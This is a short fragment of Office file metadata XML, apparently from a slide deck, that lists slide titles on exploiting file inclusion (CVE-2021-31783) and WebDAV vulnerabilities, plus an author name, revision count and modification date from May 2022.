      <vt:lpstr>Exploitation: Local File Inclusion (LFI) or Remote File Inclusion (RFI) CVE-2021-31783</vt:lpstr>
      <vt:lpstr>Exploitation: WebDAV Vulnerability</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Joshua Ling</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-20T05:59:50Z</dcterms:modified>
</cp:coreProperties>
</file>